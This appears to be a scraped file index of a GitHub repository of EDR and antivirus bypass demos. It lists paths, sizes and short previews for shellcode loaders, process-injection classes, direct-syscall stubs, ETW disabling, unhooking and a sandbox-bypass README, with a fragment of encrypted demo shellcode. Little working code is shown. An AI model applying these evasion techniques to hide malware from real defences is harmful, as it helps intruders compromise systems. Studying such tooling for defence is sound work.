"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.log",
"chars": 55,
"preview": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 143,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.exe.recipe",
"chars": 276,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.log",
"chars": 1283,
"preview": " demo1.cpp\r\nE:\\last\\demo1\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo1\\"
},
{
"path": "chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 145,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo2/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo2/enc.py",
"chars": 199,
"preview": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^"
},
{
"path": "chapter4-demo3/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo3/demo1/Header.h",
"chars": 734,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include <vector>\r\n\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000"
},
{
"path": "chapter4-demo3/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo3/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo3/demo1/demo1.cpp",
"chars": 14692,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj",
"chars": 7998,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj.filters",
"chars": 1509,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo3/demo1/nt.asm",
"chars": 1585,
"preview": ".code\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nbye :\r\nret\r\n\r\nNtCreateThreadEx PROC\r\n\tmov [rsp +8], rcx ; Save regi"
},
{
"path": "chapter4-demo3/demo1/nt.h",
"chars": 114711,
"preview": "#pragma once\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include <windows.h>\r\n\r\n#define SW3_SEED 0xA8EC79BB\r\n#de"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.exe.recipe",
"chars": 274,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.log",
"chars": 55,
"preview": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 143,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.exe.recipe",
"chars": 276,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.log",
"chars": 911,
"preview": " demo1.cpp\r\nE:\\last\\demo3\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo3\\"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 145,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/unsuccessfulbuild",
"chars": 0,
"preview": ""
},
{
"path": "chapter4-demo3/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo4/CODE_OF_CONDUCT.md",
"chars": 5263,
"preview": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nWe as members, contributors, and leaders pledge to make participa"
},
{
"path": "chapter4-demo4/LICENSE.txt",
"chars": 1112,
"preview": "MIT License\n\nCopyright (c) 2021 Mariusz Banach (mgeeky, <mb [at] binary-offensive.com>)\n\nPermission is hereby granted, f"
},
{
"path": "chapter4-demo4/README.md",
"chars": 22936,
"preview": "# Shellcode Fluctuation PoC\n\nA PoC implementation for an another in-memory evasion technique that cyclically encrypts an"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj",
"chars": 7669,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.filters",
"chars": 1281,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.user",
"chars": 411,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/base64.h",
"chars": 1233,
"preview": "#pragma once\r\n//\r\n// base64 encoding and decoding with C++.\r\n// Version: 2.rc.08 (release candidate)\r\n//\r\nconst int XO"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/header.h",
"chars": 2047,
"preview": "#pragma once\n\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\n\ntypedef "
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/main.cpp",
"chars": 18858,
"preview": "\n#include \"header.h\"\n#include <intrin.h>\n#include <random>\n#include \"base64.h\"\n\nHookedSleep g_hookedSleep;\nFluctuationMe"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
"chars": 160,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.exe.recipe",
"chars": 306,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\Shellcod"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.log",
"chars": 141,
"preview": " base64.cpp\r\n main.cpp\r\n 正在生成代码...\r\n ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Debug\\Shell"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
"chars": 162,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.exe.recipe",
"chars": 308,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\Shellcod"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.log",
"chars": 351,
"preview": " main.cpp\r\n 正在生成代码\r\n 已完成代码的生成\r\n 3 of 350 functions ( 0.9%) were compiled, the rest were copied from previous compil"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation.sln",
"chars": 1447,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3110"
},
{
"path": "demo1/README.md",
"chars": 54,
"preview": "使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀。\r\n\r\n"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/resource.h",
"chars": 380,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by shellcode_execute.rc\r\n\r\n// ¶һĬֵ\r\n// \r"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp",
"chars": 6431,
"preview": "// shellcode_execute.cpp : 此文件包含 \"main\" 函数。程序执行将在此处开始并结束。\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n\r\ntypedef v"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.rc",
"chars": 1203,
"preview": "// Microsoft Visual C++ ɵԴű\r\n//\r\n\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj",
"chars": 6810,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.filters",
"chars": 951,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.user",
"chars": 301,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute.sln",
"chars": 1470,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo2/README.md",
"chars": 116,
"preview": "使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。\r\n\r\ndemo2 使用 CreateThread方式创建新进程极易被拦截,改用EtwpCreateEtwThread加载shellcode,改版的程序为demo3.\r\n"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/App.config",
"chars": 187,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n<configuration>\r\n <startup> \r\n <supportedRuntime version=\"v4.0\" sku="
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/Program.cs",
"chars": 15269,
"preview": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/Properties/AssemblyInfo.cs",
"chars": 985,
"preview": "using System.Reflection;\r\nusing System.Runtime.CompilerServices;\r\nusing System.Runtime.InteropServices;\r\n\r\n// 有关程序集的一般信"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/shellcode_execut3.csproj",
"chars": 2382,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbu"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3.sln",
"chars": 1155,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo3/README.md",
"chars": 84,
"preview": "使用静态字符串加密,异或加密,沙箱绕过,EtwpCreateEtwThread上线的技术。\r\n\r\n在SharpInjector的基础上,增加了shellcode的混淆。"
},
{
"path": "demo3/SharpInjector-master/.gitignore",
"chars": 59,
"preview": "*/Debug/*\n*/Release/*\n*/x64/*\n*/bin/*\n*/obj/*\n.vs/*\n*.user\n"
},
{
"path": "demo3/SharpInjector-master/README.md",
"chars": 1911,
"preview": "# SharpInjector\nProject now has a 2nd branch, DInvoke, that implements Reprobate for D/Invoke functionality - 1/15/2022\n"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/App.config",
"chars": 182,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".N"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/Program.cs",
"chars": 2976,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/Properties/AssemblyInfo.cs",
"chars": 1390,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/ScEncryptor.csproj",
"chars": 2448,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/App.config",
"chars": 182,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".N"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateFiber.cs",
"chars": 2157,
"preview": "using System;\nusing System.IO;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Thr"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs",
"chars": 3978,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs",
"chars": 4000,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateThread.cs",
"chars": 1435,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.T"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs",
"chars": 1407,
"preview": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Program.cs",
"chars": 16060,
"preview": "using System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing Syste"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/AssemblyInfo.cs",
"chars": 1394,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs",
"chars": 2846,
"preview": "//------------------------------------------------------------------------------\r\n// <auto-generated>\r\n// 此代码由工具生成。"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.resx",
"chars": 6197,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<root>\r\n <!-- \r\n Microsoft ResX Schema \r\n \r\n Version 2.0\r\n \r\n T"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs",
"chars": 4549,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs",
"chars": 3940,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/SharpInjector.csproj",
"chars": 4663,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbu"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Shellycode.cs",
"chars": 628,
"preview": "namespace SharpInjector\n{\n\tclass EncryptedShellcode\n\t{\n\t\t// Example calc shellcode\n\t\tpublic string EncSc = \"ypmx+PYrXoQ1"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/WinAPI.cs",
"chars": 8767,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/SharpInjector.sln",
"chars": 2923,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.2990"
},
{
"path": "demo4/syscall/syscall/Syscall.asm",
"chars": 110,
"preview": ".code\r\n\tSysNtCreateFile proc\r\n\t\t\tmov r10, rcx\r\n\t\t\tmov eax, 55h\r\n\t\t\tsyscall\r\n\t\t\tret\r\n\tSysNtCreateFile endp\r\nend"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj",
"chars": 7863,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj.filters",
"chars": 1081,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo4/syscall/syscall/syscall_call.cpp",
"chars": 1037,
"preview": "#include <Windows.h>\r\n#include \"winternl.h\"\r\n#pragma comment(lib, \"ntdll\")\r\n\r\nEXTERN_C NTSTATUS SysNtCreateFile(\r\n\tPHAND"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.exe.recipe",
"chars": 302,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.log",
"chars": 114,
"preview": " Assembling Syscall.asm...\r\n syscall.vcxproj -> C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe\r\n"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.tlog/syscall.lastbuildstate",
"chars": 169,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "demo4/syscall/syscall.sln",
"chars": 1439,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "demo5/syscall3/syscall3/1-asm.x64.asm",
"chars": 24410,
"preview": ".code\r\n\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nEXTERN SW3_GetSyscallAddress: PROC\r\n\r\nNtCreateProcess PROC\r\n\tint 3\r\n\tmov ["
},
{
"path": "demo5/syscall3/syscall3/1.cpp",
"chars": 8559,
"preview": "#include \"1.h\"\r\n#include <stdio.h>\r\n\r\n#define DEBUG\r\n\r\n#define JUMPER\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_clean"
},
{
"path": "demo5/syscall3/syscall3/1.h",
"chars": 13566,
"preview": "#pragma once\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.c"
},
{
"path": "demo5/syscall3/syscall3/syscall3.cpp",
"chars": 116,
"preview": "#include <iostream>\r\n#include \"1.h\"\r\n\r\nint main()\r\n{\r\n NtTestAlert();\r\n\r\n //std::cout << \"Hello World!\\n\";\r\n}"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj",
"chars": 7745,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj.filters",
"chars": 1237,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo5/syscall3/syscall3.sln",
"chars": 1443,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo6/unhook_demo/Header.h",
"chars": 821,
"preview": "#pragma once\r\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\r\n\r\ntypede"
},
{
"path": "demo6/unhook_demo/unhook_demo.cpp",
"chars": 3563,
"preview": "// unhook_demo.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <i"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj",
"chars": 7669,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj.filters",
"chars": 1087,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo6/unhook_demo.sln",
"chars": 1451,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
}
]
// ... and 147 more files (download for full content)
About this extraction
This page contains the full source code of the 7BitsTeam/EDR-Bypass-demo GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 280 files (471.0 KB), approximately 132.6k tokens, and a symbol index with 320 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.